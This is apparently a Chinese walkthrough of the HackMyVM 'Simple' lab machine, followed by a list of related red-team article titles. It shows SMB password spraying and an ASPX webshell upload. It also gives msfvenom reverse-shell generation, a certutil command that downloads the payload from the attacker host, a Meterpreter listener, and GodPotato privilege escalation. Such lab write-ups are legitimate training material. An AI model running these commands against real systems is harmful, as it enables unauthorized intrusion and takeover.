HackMyVm-Simple ：简单

4.1 信息打点

端口扫描

web界面，通过界面可能存在的系统用户如下

ruy, marcos, lander, bogo, vaiper

4.2 nxc服务爆破

把上面的几个用户，追加到一个字典中，并使用这些用户作为密码进行爆破或者使用rokyou.txt

nxc smb 192.168.0.139 -u user -p user
nxc smb 192.168.0.139 -u user -p /usr/share/wordlists/rokyou.txt

发现是紫色的提示，翻译一下错误就能发现，这密码过期了，需要登录到虚拟机上修改这个账号的密码

4.3 近源攻击

按esc进入用户列表，选择bogo用户：

输入正确的密码bogo后，需要你修改密码

尝试执行命令，一切正常

4.4 smb渗透

再来到smb登录这块，就能正常登录了

再LOGS共享文件中发现了一个日志文件，使用get命令将它下载下来

尝试将之前的用户字典上传上去，使用put命令，发现没有上传权限

日志内容

┌──(root㉿kali)-[/data/demo]
└─# cat 20231008.log
PS C:\> dir \\127.0.0.1\WEB
Acceso denegado
At line:1 char:1
+ dir \\127.0.0.1\WEB
+ ~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : PermissionDenied: (\\127.0.0.1\WEB:String) [Get-ChildItem], UnauthorizedAccessException
+ FullyQualifiedErrorId : ItemExistsUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
Cannot find path '\\127.0.0.1\WEB' because it does not exist.
At line:1 char:1
+ dir \\127.0.0.1\WEB
+ ~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (\\127.0.0.1\WEB:String) [Get-ChildItem], ItemNotFoundException
+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetChildItemCommand

PS C:\> net use \\127.0.0.1\WEB
Se ha completado el comando correctamente.

PS C:\> dir \\127.0.0.1\WEB
Acceso denegado
At line:1 char:1
+ dir \\127.0.0.1\WEB
+ ~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : PermissionDenied: (\\127.0.0.1\WEB:String) [Get-ChildItem], UnauthorizedAccessException
+ FullyQualifiedErrorId : ItemExistsUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
Cannot find path '\\127.0.0.1\WEB' because it does not exist.
At line:1 char:1
+ dir \\127.0.0.1\WEB
+ ~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (\\127.0.0.1\WEB:String) [Get-ChildItem], ItemNotFoundException
+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetChildItemCommand

PS C:\> net use \\127.0.0.1\WEB /user:marcos SuperPassword
Se ha completado el comando correctamente.

PS C:\> dir \\127.0.0.1\WEB

Directorio: \\127.0.0.1\WEB

Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 10/8/2023 9:46 PM aspnet_client
-a---- 9/26/2023 6:46 PM 703 iisstart.htm
-a---- 10/8/2023 10:46 PM 158 test.php

PS C:\> rm \\127.0.0.1\WEB\*.php

PS C:\> dir \\127.0.0.1\WEB

Directorio: \\127.0.0.1\WEB

Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 10/8/2023 9:46 PM aspnet_client
-a---- 9/26/2023 6:46 PM 703 iisstart.htm

PS C:\>

又得到了一个账号密码user:marcos SuperPassword

这个用户也是一样，密码过期，需要重新设置一下密码，重复之前的步骤就好了

尝试使用put将一个文件上传上去，上传成功！有上传的权限，那么就可以将aspx马上传上去（这里的web大概率就是网站的web目录了）

4.5 获取shell

尝试使用put命令上传文件

cd /usr/share/webshells/aspx
smbclient //192.168.0.139/WEB/ -U marcos
# 密码 SuperPassword
put cmdasp.aspx

访问这个马

使用msfvenom生成反弹shell的木马

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.147 LPORT=4444 -f exe -o shell.exe

python3 -m http.server

使用下载命令，将这个木马上传到靶机上

certutil -urlcache -split -f http://192.168.0.147:8000/shell.exe c:\shell.exe
# 或者利用smbclient上传也可以，此时只需要输入一个shell.exe在那个aspx命令执行界面

打开msf启动监听

use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.147
run

在命令执行的aspx的输入框中输入这个shell.exe的绝对路径就可以执行，利用下面这个命令定位马的位置

where /r c:\ shell.exe

c:\inetpub\wwwroot\shell.exe

执行马

4.6 msf内核漏洞扫描

bg
use multi/recon/local_exploit_suggester
set session 1
run

尝试利用扫描出来的漏洞

use windows/local/cve_2020_0787_bits_arbitrary_file_move

存在漏洞但是始终没有创建shell会话

找到CVE-2020-0787的exp

# 源码
https://github.com/cbwang505/CVE-2020-0787-EXP-ALL-WINDOWS-VERSION.git

# 创建好的
https://github.com/cbwang505/CVE-2020-0787-EXP-ALL-WINDOWS-VERSION/releases/download/1/BitsArbitraryFileMoveExploit.exe

此时去上传文件（这里我换了一个网，ip就变了，我用的桥接模式，使用vmbox用nat模式会出问题，导致vmware的虚拟器kali访问不到vmbox，这是最简单的解决方法）

smbclient //192.168.110.46/WEB/ -U marcos
put BitsArbitraryFileMoveExploit.exe

提权失败

4.7 土豆提权

切换提权方式土豆提权，将这些全都下载下来

https://github.com/BeichenDream/GodPotato/releases/tag/V1.20

可以看到这里我们执行的whoami已经是系统权限了，此时我们只需要添加一个反弹一个shell到本地来就可以了

msf反弹shell

shell反弹过来后，却不是system权限，接下来要将这个木马设置为系统权限，而不是这个用户的文件，类似于linux中的属主

4.8 修改文件权限

GodPotato-NET4.exe -cmd "cmd /c takeown /f c:\inetpub\wwwroot\shell.exe /a"

重新反弹即可

往期推荐

全网首发！HMV全套windows机器提权，域渗透教程，2w字超详细

HackMyVm-DC04 ：简单

HackMyVm-DC03 ：简单

HackMyVm-DC02 ：简单

HackMyVm-DC01 ：简单

HackMyVm-TriplAdvisor ：简单

HackMyVm-Runas ：简单

HackMyVm-Always ：简单

HackMyVm-Nessus ：简单

HackMyVm-Liar ：简单

HackMyVm-Simple ：简单

HackMyVm-Simple ：简单

HackMyVm-Zero ：简单

HackMyVm-OMG ：简单

新版BurpSuite v2025.6.3汉化版，附激活教程

Fine！2025最新款信息收集综合工具

若依Vue漏洞检测工具v7更新

最好用的下一代目录爆破工具，全方位的目录爆破

集成MemProcFS，Vol2和Vol3的内存取证神器

重大更新！FeatherScan v4.5 内网 linux 信息收集，提权一键梭哈神器

x-waf，一个基于fuzz的waf绕过渗透工具

这10款内网穿透工具，一定有你没用过的

红队命令速查手册

挖SRC必须知道的25个漏洞提交平台

挖SRC必须知道的25个漏洞提交平台

FeatherScan v4.0 – 一款Linux内网全自动信息收集工具

掩日-适用于红队的综合免杀工具

2025最新渗透测试靶场推荐

近400个渗透测试常用命令，信息收集、web、内网、隐藏通信、域渗透等等

【内网渗透】隐藏通信隧道技术

内网渗透必备，microsocks，一个轻量级的socks代理工具

神器分享 红队快速打点工具-DarKnuclei

红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路

【渗透测试】DC1~9(全) Linux提权靶机渗透教程，干货w字解析，建议收藏

【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！

一个永久的渗透知识库

【oscp】vulnerable_docker，三种代理方法打入内网

【内网渗透】CobaltStrike与MSF联动互相上线的方式

内网渗透必备，microsocks，一个轻量级的socks代理工具

【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！绝对干货！

DC-2综合渗透，rbash逃逸，git提权，wordpress靶场渗透教程

【渗透测试】12种rbash逃逸方式总结

红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路

红日靶场3，joomla渗透，海德拉SMB爆破，域内5台主机横向移动教学

不用MSF？红日靶场4，从外网到域控，手工干永恒之蓝，教科书级渗透教学

ATK&CK红日靶场二，Weblogic漏洞利用，域渗透攻略

sql注入中各种waf的绕过方式，狗，盾，神，锁，宝

利用MySQL特性，WAF绕过技巧

SQL注入绕过某狗的waf防火墙，这一篇就够了，6k文案超详细

大型翻车现场，十种waf绕过姿势，仅成功一种

喜欢长文吗？1w字图文带你了解sqlmap，从0到1，WAF绕过，高级用法一文通透

本站内容部分转载于互联网，并不代表本站立场！如若本站内容侵犯了原著者的合法权益，可联系我们进行处理！ 拒绝任何人以任何形式在本站发表与中华人民共和国法律相抵触的言论！